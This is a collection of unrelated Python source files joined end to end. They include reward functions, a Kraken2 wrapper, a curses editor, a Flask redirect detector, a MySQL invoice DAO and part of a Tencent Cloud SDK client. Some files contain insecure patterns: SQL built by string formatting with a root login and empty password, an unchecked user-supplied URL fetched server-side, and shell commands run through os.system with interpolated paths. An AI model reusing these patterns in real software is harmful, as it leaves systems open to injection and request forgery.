get_episode_reward_agent(health_lost_self, health_lost_opponent, threshold_self, threshold_opponent, damage_cost_self=0, end_step_opponent=-1, **rewards): assert len(rewards), "No episode rewards provided.." episode_reward = 0 # discourage free loaders # if damage_cost_self == 0: # return episode_reward threshold_offset = rewards["soft_bound"]["dist"][-1] if rewards["episode_decay_soft"] is True else 0 # give rewards for terminating the opponent agent if health_lost_opponent >= threshold_opponent - threshold_offset: # health based reward for surviving episode_reward += get_reward_type(health_lost_self, **rewards["health_lookup"]) # speed based reward for fast termination if end_step_opponent > 0: episode_reward += get_reward_type(end_step_opponent, **rewards["faster_lookup"]) # apply soft boundary factor if rewards["episode_decay_soft"] is True and health_lost_opponent < threshold_opponent: _dist = threshold_opponent - health_lost_opponent index = next(_idx for _idx, _val in enumerate(rewards["soft_bound"]["dist"]) if _val >= _dist) episode_reward = ceil(episode_reward * rewards["soft_bound"]["decay_factor"][index]) return episode_reward def get_reward_type(value, **_dict): _reward = 0 _type = _dict["type"] if _type == "none": return _reward elif _type == "table": _reward = get_table_reward(value, **_dict) elif _type == "segment": _reward = get_segment_reward(value, **_dict) else: assert f"Reward function not implemented:{_dict}" return _reward def get_table_reward(damage_taken, **_dict): # find the index of the fist element in the list that no less than the target damage index = next(_idx for _idx, _val in enumerate(_dict["damage"]) if _val >= damage_taken) return _dict["reward"][index] def get_segment_reward(step, **_dict): # segment reward function: [rew_start (from step 0 to pivot_step) -> (linear rew_decay per step) -> 0] step_start = _dict["pivot_step"] reward_start = _dict["reward_init"] reward_decay = _dict["reward_decay"] if step > step_start: _reward = reward_start - int((step - step_start) * reward_decay) reward = _reward if _reward > 0 else 0 else: reward = reward_start return reward def get_episode_reward_team(health_list_r, health_list_b, health_init, damage_thres_r, damage_thres_b, damage_list_r, endtime_list_b, **rewards): assert len(rewards), "No episode rewards provided.." episode_reward = 0 # TODO>> team based reward for all agents in the team return episode_reward BoyanZhou/LongStrain """ This script processes raw reads data by Kraken Must include "--use-mpa-style --report-zero-counts" in parameters Update log: Date: 2021/06/25 Author: 1. make it a module in LongStrain 2. version of kraken/2.0.8 """ import os import sys def kraken_process_total(sample_name_list, all_sample_fq_path_list, sample_output_folder_list, kraken_database_path, logger): """ Get processed fq and relative abundance report by Kraken :param sample_name_list: ["sample1", "sample2"] :param all_sample_fq_path_list: [["path/x.fq"], ["path/x_R1.fq", "path/x_R2.fq"]] :param sample_output_folder_list: ["output_path/subject1/sample1", "output_path/subject1/sample2"] :param kraken_database_path: "/gpfs/data/lilab/home/zhoub03/software/kraken2/NCBI_standard" :param logger: a logging object :return: sample_output.txt, sample_report.txt, for single, """ for sample_index in range(len(sample_name_list)): sample_name = sample_name_list[sample_index] sample_fq_path_list = all_sample_fq_path_list[sample_index] sample_output_folder = sample_output_folder_list[sample_index] # paired-end or single-end if len(sample_fq_path_list) == 1: # single command_kraken2 = f"kraken2 --db {kraken_database_path} --report {sample_output_folder}/{sample_name}_" \ f"report.txt --use-mpa-style --report-zero-counts --classified-out " \ f"{sample_output_folder}/{sample_name}_#.fq {sample_fq_path_list[0]} " \ f"--output {sample_output_folder}/{sample_name}_output.txt" elif len(sample_fq_path_list) == 2: # paied command_kraken2 = f"kraken2 --db {kraken_database_path} --report {sample_output_folder}/{sample_name}_" \ f"report.txt --use-mpa-style --report-zero-counts --paired --classified-out " \ f"{sample_output_folder}/{sample_name}_#.fq {sample_fq_path_list[0]} " \ f"{sample_fq_path_list[1]} --output {sample_output_folder}/{sample_name}_output.txt" else: logger.info(f"Error! {sample_name} has incorrect number of fqs: {sample_fq_path_list} Terminated.") sys.exit() logger.info(f"Processing {sample_name} by Kraken: {command_kraken2}") os.system(command_kraken2) czechuuu/MTE import curses import loc_constants as const from typing import List # constants def main(stdscr): # TODO loading from files contents: List[List[str]] = [[]] char = "" special = "" while True: # getting current cursour coordinates x: int y: int y, x = stdscr.getyx() max_x: int max_y: int max_y, max_x = stdscr.getmaxyx() upper_rights = [f"{y}:{x}", ""] # text in the upper right corner # printing the test in the upper right corner def print_rights(elements): try: for num, el in enumerate(elements): stdscr.addstr(num*2, max_x - len(el) - 2, el) stdscr.move(y, x) stdscr.refresh() except Exception: pass print_rights(upper_rights) # getting a key char: str = stdscr.getkey() # exit condition default: ^Q if char == "\x11" or char == const.A_EXIT: try: special = "EXIT (y/n)" upper_rights[1] = special print_rights(upper_rights) accept = stdscr.getkey() accepted = {"y", "Y", " ", " "} if accept in accepted: exit() else: special = "not exiting" upper_rights[1] = special except Exception: pass # printing ascii characters if len(char) == 1 and ord(char) in range(32, 256) and char != "\x0a": try: contents[y].insert(x, char) y, x = y, x + 1 except Exception: pass # newline elif char == "\n": try: if x == len(contents[y]): # newline in the end of a line contents.insert(y + 1, []) else: # newline in the middle of a line popped_value = contents[y][x:] contents.insert(y + 1, popped_value) del popped_value y, x = y + 1, 0 except Exception: pass # backspace elif char == "\x08" or char == "^?": try: if not (y == 0 and x == 0): # cant delete nothing if x > 0: # standard backspace contents[y].pop(x-1) y, x = y, x - 1 stdscr.refresh() else: # backspace on a newline popped_value = contents.pop(y) if popped_value != "" and y != 0: for el in popped_value: contents[y-1].append(el) y, x = y - 1, len(contents[y - 1]) except Exception: pass # keys default: arrows or ^ESDF elif char == "KEY_UP" or char == "\x05" or char == const.A_UP: try: if y > 0: if len(contents[y - 1]) >= x: y, x = y - 1, x else: y, x = y-1, len(contents[y - 1]) except Exception: pass elif char == "KEY_DOWN" or char == "\x04" or char == const.A_DOWN: try: if y < len(contents) - 1: if len(contents[y + 1]) >= x: y, x = y + 1, x else: y, x = y + 1, len(contents[y + 1]) except Exception: pass elif char == "KEY_LEFT" or char == "\x13" or char == const.A_LEFT: try: if not (y == 0 and x == 0): if x != 0: y, x = y, x - 1 else: y, x = y - 1, len(contents[y - 1]) except Exception: pass elif char == "KEY_RIGHT" or char == "\x06" or char == const.A_RIGHT: try: if not (y == len(contents) - 1 and x == len(contents[y])): if x != len(contents[y]): y, x = y, x + 1 else: y, x = y + 1, 0 except Exception: pass # printing the contents to screen stdscr.clear() print_rights(upper_rights) for num, line in enumerate(contents): stdscr.addstr(num, 0, "".join(line)) stdscr.move(y, x) curses.wrapper(main) from jacowvalidator.docutils.styles import check_style_detail STYLES = { 'normal': { 'type': 'Abstract Heading', 'styles': { 'jacow': 'JACoW_Abstract_Heading', 'normal': 'Abstract_Heading', }, 'alignment': None, 'font_size': 12.0, 'space_before': 0.0, 'space_after': 3.0, 'bold': None, 'italic': True, } } EXTRA_RULES = [ "Text must be Abstract", ] HELP_INFO = 'SCEAbsract' def get_abstract_detail(p): abstract_detail = { 'text': p.text, 'original_text': p.text, } return abstract_detail def get_abstract_summary(p): style_compare = STYLES['normal'] details = get_abstract_detail(p) details.update(check_style_detail(p, style_compare)) title_style_ok = p.style.name == style_compare['styles']['jacow'] details.update({'title_style_ok': title_style_ok, 'style': p.style.name}) return { 'details': [details], 'rules': STYLES, 'extra_rules': EXTRA_RULES, 'help_info': HELP_INFO, 'title': 'Abstract Heading', 'ok': details['style_ok'], 'message': 'Abstract issues', 'anchor': 'abstract' } def get_abstract_summary_latex(part): if part and part.contents: text = 'Abstract' for i, p in enumerate(part.contents): # make sure abstract has text if not p == '': return {'text': text, 'title': 'Abstract', 'ok': True, 'extra_info': f'Abstract: {text}'} return {'text': '', 'title': 'Abstract', 'ok': False, 'extra_info': f'No Abstract found'} # This sample tests type narrowing of generic constrained types. from typing import AnyStr, Generic, List, Optional, Sequence, TypeVar, Union Command = Union[AnyStr, Sequence[AnyStr]] def version1(cmd: Command) -> List[str]: if isinstance(cmd, bytes): return [str(cmd, "utf-8")] if isinstance(cmd, str): return [cmd] ret: List[str] = [] for itm in cmd: if isinstance(itm, str): ret.append(itm) else: ret.append(str(itm, "utf-8")) return ret T = TypeVar("T", str, int, float, bool) class Item(Generic[T]): value: Optional[T] def __init__(self, source: Optional[T]) -> None: self.value = source def read(self) -> Optional[T]: if self.value is None: raise RuntimeError(f"Item is required!") return self.value hitchdev/hitchqs from hitchqs import commandline import requests class ServerError(Exception): pass # def f1(): # try: # print('1' + 2) # except TypeError as e: # pass # # # f1() def connectServer(): try: req = requests.get("httpxsfafdasfasdf://www.baidu.com") print(req.text) except Exception as e: raise ServerError() connectServer()markfoodyburton/PySysC # # Copyright (c) 2019 -2021 MINRES Technolgies GmbH # # SPDX-License-Identifier: Apache-2.0 # import os.path import logging import cppyy from cppyy import gbl as cpp import pysysc from pysysc.structural import Connection, Module, Signal, Simulation num_of_mem = 100 class TopModule(cpp.scc.PyScModule): def __init__(self, name): super().__init__(self, name) ############################################################################### # instantiate ############################################################################### self.clk_gen = Module(cpp.ClkGen).create("clk_gen") self.rst_gen = Module(cpp.ResetGen).create("rst_gen") self.initiator = Module(cpp.Initiator).create("initiator") self.memories = [Module(cpp.Memory).create("mem%d"%idx) for idx in range(0,num_of_mem)] self.router = Module(cpp.Router[num_of_mem]).create("router") ############################################################################### # connect them ############################################################################### self.clk = Signal("clk").src(self.clk_gen.clk_o).sink(self.initiator.clk_i).sink(self.router.clk_i) [self.clk.sink(m.clk_i) for m in self.memories] self.rst = Signal("rst").src(self.rst_gen.reset_o).sink(self.initiator.reset_i).sink(self.router.reset_i) [self.rst.sink(m.reset_i) for m in self.memories] Connection().src(self.initiator.socket).sink(self.router.target_socket) [Connection().src(self.router.initiator_socket.at(idx)).sink(m.socket) for idx,m in enumerate(self.memories)] super().method("TickMethod", [self.clk.signal.pos_edge()]) def EndOfElaboration(self): print("Elaboration finished") def StartOfSimulation(self): print("Simulation started") def EndOfSimulation(self): print("Simulation finished") def TickMethod(self): print("Simulation tick") ############################################################################### # setup and load ############################################################################### logging.basicConfig(level=logging.INFO) build_type='Debug' ############################################################################### #myDir = os.path.dirname( os.path.realpath(__file__)) myDir = os.path.dirname( os.path.realpath(__file__)+'/../../PySysC-SC') pysysc.read_config_from_conan(os.path.join(myDir, 'conanfile.txt'), build_type) pysysc.load_systemc() ############################################################################### logging.debug("Loading SC-Components lib") pysysc.add_include_path(os.path.join(myDir, 'sc-components/incl')) pysysc.add_library('scc.h', os.path.join(myDir, 'build/%s/lib/libsc-components.so'%build_type)) ############################################################################### logging.debug("Loading Components lib") pysysc.add_include_path(os.path.join(myDir, 'components')) pysysc.add_library('components.h', os.path.join(myDir, 'build/%s/lib/libcomponents.so'%build_type)) ############################################################################### # configure ############################################################################### Simulation.setup(logging.root.level) ############################################################################### # instantiate ############################################################################### #from modules import TopModule dut = Module(TopModule).create("dut") ############################################################################### # run if it is standalone ############################################################################### if __name__ == "__main__": Simulation.configure(enable_vcd=False) Simulation.run() logging.debug("Done") 0 """ PANalytical - Omnia Axios XRF """ from bika.lims import bikaMessageFactory as _, t from . import AxiosXrfImporter, AxiosXrfCSVParser, AxiosXrfCSVMultiParser import json import traceback title = "PANalytical - Omnia - Axios XRF" def Import(context, request): """ PANalytical - Omnia Axios_XRF analysis results """ infile = request.form['panalytical_omnia_axios_file'] fileformat = request.form['panalytical_omnia_axios_format'] artoapply = request.form['panalytical_omnia_axios_artoapply'] override = request.form['panalytical_omnia_axios_override'] sample = request.form.get('panalytical_omnia_axios_sample', 'requestid') instrument = request.form.get('panalytical_omnia_axios_instrument', None) errors = [] logs = [] warns = [] # Load the most suitable parser according to file extension/options/etc... parser = None if not hasattr(infile, 'filename'): errors.append(_("No file selected")) if fileformat == 'csv': parser = AxiosXrfCSVParser(infile) elif fileformat == 'csv_multi': parser = AxiosXrfCSVMultiParser(infile) else: errors.append(t(_("Unrecognized file format ${file_format}", mapping={"file_format": fileformat}))) if parser: # Load the importer status = ['sample_received', 'attachment_due', 'to_be_verified'] if artoapply == 'received': status = ['sample_received'] elif artoapply == 'received_tobeverified': status = ['sample_received', 'attachment_due', 'to_be_verified'] over = [False, False] if override == 'nooverride': over = [False, False] elif override == 'override': over = [True, False] elif override == 'overrideempty': over = [True, True] sam = ['getRequestID', 'getSampleID', 'getClientSampleID'] if sample == 'requestid': sam = ['getRequestID'] if sample == 'sampleid': sam = ['getSampleID'] elif sample == 'clientsid': sam = ['getClientSampleID'] elif sample == 'sample_clientsid': sam = ['getSampleID', 'getClientSampleID'] importer = AxiosXrfImporter(parser=parser, context=context, idsearchcriteria=sam, allowed_ar_states=status, allowed_analysis_states=None, override=over, instrument_uid=instrument) tbex = '' try: importer.process() except: tbex = traceback.format_exc() errors = importer.errors logs = importer.logs warns = importer.warns if tbex: errors.append(tbex) results = {'errors': errors, 'log': logs, 'warns': warns} return json.dumps(results) Uche Clare/Phase 1/Python Basic 1/Day 11/Task 93.py1-10 print(id(70)) # -*- encoding: utf-8 -*- """ Copyright (c) 2019 - present AppSeed.us """ from django.contrib import admin from django.urls import path, include # add this from django.conf.urls.i18n import i18n_patterns from django.utils.translation import gettext_lazy as _ urlpatterns = [ path(_('admin/'), admin.site.urls), # Django admin route ] urlpatterns += i18n_patterns ( path("", include("authentication.urls")), path("", include("app.urls")), )redirectangular/src/app.py #Import dependencies from flask import Flask, render_template, request import requests #Create instance of Flask App app = Flask(__name__) #Define Route and Content of that page @app.route("/") def home(): return render_template("index.html") @app.route("/detect") def detect_redirects(): url = request.args.get('url') r = requests.get(url) str_response = '' for i, response in enumerate(r.history, 1): print(i, response.url) str_response += str(i) + ' ' + response.url + '
    ' # print ("redirects to {} with a status code of {} ".format(r.url,r.status_code)) str_response += ("redirects to {} with a status code of {} ".format(r.url,r.status_code)) return str_response #Define route 2 and content #Define route 3 and content #Running and Controlling the script if (__name__ =="__main__"): app.run(host='0.0.0.0', port=5000)theballdredge/certsrvconftest.py import pytest def pytest_addoption(parser): parser.addoption("--adcs", action="store", default='localhost', help="Active Directory Certificates Services server to use") parser.addoption("--username", action="store", help="Username for auth", default="user") parser.addoption("--password", action="store", help="Password for auth", default="password") parser.addoption("--template", action="store", help="Template to use", default="WebServer") parser.addoption("--manual-template", action="store", help="Template with manual approval", default="WebServer_Manual") @pytest.fixture def opt_adcs(request): return request.config.getoption("--adcs") @pytest.fixture def opt_username(request): return request.config.getoption("--username") @pytest.fixture def opt_password(request): return request.config.getoption("--password") @pytest.fixture def opt_template(request): return request.config.getoption("--template") @pytest.fixture def opt_mantemplate(request): return request.config.getoption("--manual-template") 0 from viewdom import html, render def Heading(): return html('

    My Title

    ') vdom = html('<{Heading} />') # H(tag=, props={}, children=[]) result = render(vdom) # '

    My Title

    ' # end-before expected = '

    My Title

    ' from webapp1.views.tic_tac_toe.v2 import game_rule # ------- -------------------- --------- # 1 2 3 # 1. アプリケーション フォルダー名 # 2. ディレクトリー名 # 3. Python ファイル名。拡張子抜き class JudgeCtrl(): """審判コントロール""" def __init__(self, playeq, userCtrl): """生成 Parameters ---------- playeq: 遊具 userCtrl: ユーザーコントロール """ self._playeq = playeq """遊具""" self._userCtrl = userCtrl """ユーザーコントロール""" def doNothing(): pass self._onWon = doNothing """イベントリスナー""" self._onDraw = doNothing def onWon(self, func): """勝ったとき""" self._onWon = func def onDraw(self, func): """引き分けたとき""" self._onDraw = func def doJudge(self, myPiece): """ゲームオーバー判定""" self._playeq.gameoverState = self.makeGameoverState() print(f"[doJudge] gameoverState={self._playeq.gameoverState}") if self._playeq.gameoverState == game_rule.GAMEOVER_WIN: self._onWon(myPiece) elif self._playeq.gameoverState == game_rule.GAMEOVER_DRAW: self._onDraw() elif self._playeq.gameoverState == game_rule.GAMEOVER_LOSE: pass elif self._playeq.gameoverState == game_rule.GAMEOVER_NONE: pass else: raise ValueError( f"Unexpected gameoverState={self._playeq.gameoverState}") def makeGameoverState(self): """ゲームオーバー判定 * 自分が指した後の盤面(=手番が相手に渡った始めの盤面)を評価することに注意してください Returns ------- ゲームオーバー状態 """ print( f"[makeGameoverState] isThere3SamePieces={self._playeq.isThere3SamePieces()}") if self._playeq.isThere3SamePieces(): for squaresOfWinPattern in game_rule.WIN_PATTERN: print( f"[makeGameoverState] self.isPieceInLine(squaresOfWinPattern)={self.isPieceInLine(squaresOfWinPattern)}") if self.isPieceInLine(squaresOfWinPattern): print( f"[makeGameoverState] self._playeq.isMyTurn={self._playeq.isMyTurn}") if self._playeq.isMyTurn: # 相手が指して自分の手番になったときに 3目が揃った。私の負け return game_rule.GAMEOVER_LOSE else: # 自分がが指して相手の手番になったときに 3目が揃った。私の勝ち return game_rule.GAMEOVER_WIN if self._playeq.isBoardFill(): # 勝ち負けが付かず、盤が埋まったら引き分け return game_rule.GAMEOVER_DRAW # ゲームオーバーしてません return game_rule.GAMEOVER_NONE def isPieceInLine(self, squaresOfWinPattern): """石が3つ並んでいるか? Parameters ---------- squaresOfWinPattern : _type_ 勝ちパターン Returns ------- _type_ 並んでいれば真、それ以外は偽 """ return self._playeq.getPieceBySq(squaresOfWinPattern[0]) != game_rule.PC_EMPTY and \ self._playeq.getPieceBySq(squaresOfWinPattern[0]) == self._playeq.getPieceBySq(squaresOfWinPattern[1]) \ and self._playeq.getPieceBySq(squaresOfWinPattern[0]) == self._playeq.getPieceBySq(squaresOfWinPattern[2]) import pymysql from notafiscal import NotaFiscal from cliente import Cliente from tipocliente import TipoCliente class NotaFiscalDao: def __init__(self): self.conexao = pymysql.connect(db = 'nf', user = 'root', passwd = '') self.cursor = self.conexao.cursor() def __del__(self): self.cursor.close() self.conexao.close() def inserir(self, notafiscal : NotaFiscal): self.cursor.execute("INSERT INTO notafiscal (idNotaFiscal, codigo, Cliente_idCliente) VALUES ({}, {}, {})".format(notafiscal._id, notafiscal._codigo, notafiscal._cliente._id)) self.conexao.commit() def consultar(self): self.cursor.execute("SELECT n.idNotaFiscal, n.codigo, c.idCliente, c.nome, c.codigo, c.cnpjcpf, c.tipo FROM notafiscal AS n JOIN cliente AS c ON (c.idCliente = n.Cliente_idCliente)") resultados = self.cursor.fetchall() notas = [] for linha in resultados: notas.append(NotaFiscal(linha[0], linha[1], Cliente(linha[2], linha[3], linha[4], linha[5], TipoCliente.retonar_enum(int(linha[6]))))) return notas def atualizar(self, notafiscal : NotaFiscal): self.cursor.execute("UPDATE notafiscal SET codigo = {}, Cliente_idCliente = {} WHERE idNotaFiscal = {}".format(notafiscal._codigo, notafiscal._cliente._id, notafiscal._id)) self.conexao.commit() def excluir(self, notafiscal : NotaFiscal): self.cursor.execute("DELETE FROM notafiscal WHERE idNotaFiscal = {}".format(notafiscal._id)) self.conexao.commit() def serial(self): self.cursor.execute("SELECT coalesce(MAX(idNotaFiscal), 0) + 1 FROM notafiscal") resultado = self.cursor.fetchone() return int(resultado[0])from pdia.extendedInfoParser.parseJSON import parseJsonDatum def parseMathML(js): """Parse a JSON string, return parsed object without the MathML. The current observable log for MathML includes both the "contentMathML" and an latex field. Here we just want to return the latex. We can simply ignore the `contentMathML`. In the case one needs to translate MathML expressions to latex, use pdia.utils.mml2latex(). :param js: input JSON string :return: parsed dict object without the "contentMathML" part """ res = parseJsonDatum(js) # Now get rid of the MathML try: del res['contentMathML'] except: pass return res import logging import aiohttp log = logging.getLogger(__name__) class CatNip: def __init__(self, client, api_base): self.client = client self.api_base = api_base self.sess = aiohttp.ClientSession() @property def headers(self): return { 'Authorization': f'Bot {self.client._token}' } def _route(self, route): return f'{self.api_base}{route}' async def request(self, verb: str, route: str, payload: dict): """Request a route from the API.""" log.info(f'{verb} request to {route}') async with self.sess.request(verb, self._route(route), json=payload, headers=self.headers) as resp: return resp async def get(self, route, payload=None): """Make a GET request to the API.""" resp = await self.request('GET', route, payload) return await resp.json() async def post(self, route, payload=None): """Make a POST request to the API.""" resp = await self.request('POST', route, payload) return await resp.json() from setuptools import setup, find_packages from os.path import join, abspath, dirname requirements_txt = join(abspath(dirname(__file__)), 'requirements.txt') requirements = [l.strip() for l in open(requirements_txt) if l and not l.startswith('#')] def _translate_req(r): # this>=0.3.2 -> this(>=0.3.2) ops = ('<=', '>=', '==', '<', '>', '!=') _version = None for op in ops: if op in r: r, _version = r.split(op) _version = op + _version req = r if _version: req += '(%s)' % _version return req version = '0.14.dev0' setup( name='EGCG-Core', version=version, packages=find_packages(exclude=('tests',)), url='https://github.com/EdinburghGenomics/EGCG-Core', license='MIT', description='Shared functionality across EGCG projects', long_description='Common modules for use across EGCG projects. Includes logging, configuration, common ' 'exceptions, random utility functions, and modules for interfacing with external data ' 'sources such as EGCG\'s reporting app and Clarity LIMS instance', classifiers=[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Healthcare Industry", "Intended Audience :: Science/Research", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: 3.6", ], keywords='EdinburghGenomics executor notification logging api rest', requires=[_translate_req(r) for r in requirements], # metadata install_requires=requirements, # actual module requirements scripts=['bin/integration_test_runner.py'], zip_safe=False, author='', author_email='' ) import json import pytest @pytest.mark.asyncio async def test_item_search_get_filter_extension_cql( app_client, load_test_data, load_test_collection ): """Test GET search with JSONB query (cql json filter extension)""" test_item = load_test_data("test_item.json") resp = await app_client.post( f"/collections/{test_item['collection']}/items", json=test_item ) assert resp.status_code == 200 # EPSG is a JSONB key params = { "collections": [test_item["collection"]], "filter": { "gt": [ {"property": "proj:epsg"}, test_item["properties"]["proj:epsg"] + 1, ] }, } resp = await app_client.post("/search", json=params) resp_json = resp.json() assert resp.status_code == 200 assert len(resp_json.get("features")) == 0 params = { "collections": [test_item["collection"]], "filter": { "eq": [ {"property": "proj:epsg"}, test_item["properties"]["proj:epsg"], ] }, } resp = await app_client.post("/search", json=params) resp_json = resp.json() assert len(resp.json()["features"]) == 1 assert ( resp_json["features"][0]["properties"]["proj:epsg"] == test_item["properties"]["proj:epsg"] ) frameworks/tensorflow/perf_tests/one_hot.py100-1000 #!/usr/bin/env python3 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. import tensorflow as tf from tensorflow.contrib import antares if tf.version.VERSION.startswith('2.'): tf = tf.compat.v1 tf.disable_eager_execution() from _common import * x = create_variable([1024], dtype=tf.int32) compare_ops( tf.one_hot(x, depth=128), antares.make_op('output0[N, F] = const(1.0).when([input0[N] == F], 0.0) where F in 128', [x]), ) 0 import socket HOST = 'localhost' PORT = 4900 clienteCalc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) pedido = input("Insira a operação que deseja realizar:") byte_msg = pedido.encode('utf-8') clienteCalc.sendto(byte_msg, (HOST, PORT)) modifiedMessage, serverAddress = clienteCalc.recvfrom(2048) #print(result) print(modifiedMessage.decode('utf-8')) clienteCalc.close() i90/config.py # i90/config.py from os import environ from cached_property import cached_property class Config: @cached_property def protocol(self): return environ["MY_PROTOCOL"] @cached_property def host(self): return environ["MY_HOST"] @cached_property def token_byte_length(self): return int(environ.get("TOKEN_BYTE_LENGTH", 16)) @cached_property def stage(self): return environ["STAGE"] @cached_property def dynamo_configuration(self): endpoint = environ.get("DYNAMO_ENDPOINT") if endpoint: return {"endpoint_url": endpoint} return {} @cached_property def redirects_table(self): return environ["REDIRECTS_TABLE"] @cached_property def catchall_redirect(self): return environ.get( "CATCHALL_REDIRECT", "https://www.voteamerica.com/?utm_medium=referral&utm_source=i90&utm_campaign=general-i90&source=va_referral_i90_general-i90" ) @cached_property def tracking_stream(self): return environ["TRACKING_STREAM"] config = Config() setup.py import pathlib import setuptools # The directory containing this file HERE = pathlib.Path(__file__).parent # The text of the README file README = (HERE / "README.md").read_text() # This call to setup() does all the work setuptools.setup( name="rx-scheduler", version="0.0.1", description="Function interval runner based on rxpy and asyncio", long_description=README, long_description_content_type="text/markdown", url="https://github.com/ryazantseff/rxpy-scheduler", author="", author_email="", license="MIT", keywords = ['Scheduler', 'rxpy', 'async'], install_requires=[ 'asyncio', 'rx', ], packages=setuptools.find_packages(), classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], ) tencentcloud/eiam/v20210420/eiam_client.py # -*- coding: utf8 -*- # Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException from tencentcloud.common.abstract_client import AbstractClient from tencentcloud.eiam.v20210420 import models class EiamClient(AbstractClient): _apiVersion = '2021-04-20' _endpoint = 'eiam.tencentcloudapi.com' _service = 'eiam' def AddAccountToAccountGroup(self, request): """账号组添加账号 :param request: Request instance for AddAccountToAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.AddAccountToAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.AddAccountToAccountGroupResponse` """ try: params = request._serialize() body = self.call("AddAccountToAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.AddAccountToAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def AddUserToUserGroup(self, request): """加入用户到用户组 :param request: Request instance for AddUserToUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.AddUserToUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.AddUserToUserGroupResponse` """ try: params = request._serialize() body = self.call("AddUserToUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.AddUserToUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateAccountGroup(self, request): """创建账号组 :param request: Request instance for CreateAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateAccountGroupResponse` """ try: params = request._serialize() body = self.call("CreateAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateAppAccount(self, request): """创建应用账号 :param request: Request instance for CreateAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateAppAccountResponse` """ try: params = request._serialize() body = self.call("CreateAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateOrgNode(self, request): """新建一个机构节点 :param request: Request instance for CreateOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateOrgNodeResponse` """ try: params = request._serialize() body = self.call("CreateOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateUser(self, request): """新建一个用户 :param request: Request instance for CreateUser. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateUserResponse` """ try: params = request._serialize() body = self.call("CreateUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateUserGroup(self, request): """新建用户组 :param request: Request instance for CreateUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateUserGroupResponse` """ try: params = request._serialize() body = self.call("CreateUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteAccountGroup(self, request): """删除账号组 :param request: Request instance for DeleteAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteAccountGroupResponse` """ try: params = request._serialize() body = self.call("DeleteAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteAccountGroupResponse() 